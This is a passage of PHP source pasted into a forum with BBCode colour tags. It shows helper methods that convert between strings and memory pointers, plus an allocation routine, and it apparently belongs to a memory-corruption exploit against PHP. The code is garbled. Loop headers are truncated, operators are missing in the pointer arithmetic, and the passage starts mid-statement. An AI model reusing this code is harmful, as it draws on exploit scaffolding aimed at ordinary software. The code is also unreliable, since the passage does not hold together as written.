for([/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"][/COLOR][COLOR="#0000BB"]hfp[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"\x00"[/COLOR][COLOR="#007700"]);
}
}
private function[/COLOR][COLOR="#0000BB"]str2ptr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$p[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$n[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]8[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]$address[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"];
for([/COLOR][COLOR="#0000BB"]$j[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$n[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]$j[/COLOR][COLOR="#007700"]>=[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]$j[/COLOR][COLOR="#007700"]--) {
[/COLOR][COLOR="#0000BB"]$address[/COLOR][COLOR="#007700"][/COLOR][COLOR="#0000BB"]abc[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$p[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]$j[/COLOR][COLOR="#007700"]]);
}
return[/COLOR][COLOR="#0000BB"]$address[/COLOR][COLOR="#007700"];
}
private function[/COLOR][COLOR="#0000BB"]ptr2str[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$ptr[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$n[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]8[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]$out[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];
for ([/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"]>=[/COLOR][COLOR="#0000BB"]8[/COLOR][COLOR="#007700"];
}
return[/COLOR][COLOR="#0000BB"]$out[/COLOR][COLOR="#007700"];
}
private function[/COLOR][COLOR="#0000BB"]log[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$format[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$val[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]) {
if([/COLOR][COLOR="#0000BB"]LOGGING[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]printf[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$format[/COLOR][COLOR="#007700"]}[/COLOR][COLOR="#DD0000"]\n"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$val[/COLOR][COLOR="#007700"]);
}
}
static function[/COLOR][COLOR="#0000BB"]alloc[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$size[/COLOR][COLOR="#007700"]) {
return[/COLOR][COLOR="#0000BB"]str_shuffle[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]str_repeat[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'A'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$size[/COLOR][COLOR="#007700"]));
}
}
[/COLOR][COLOR="#0000BB"]?>
[/COLOR]
[/COLOR]
|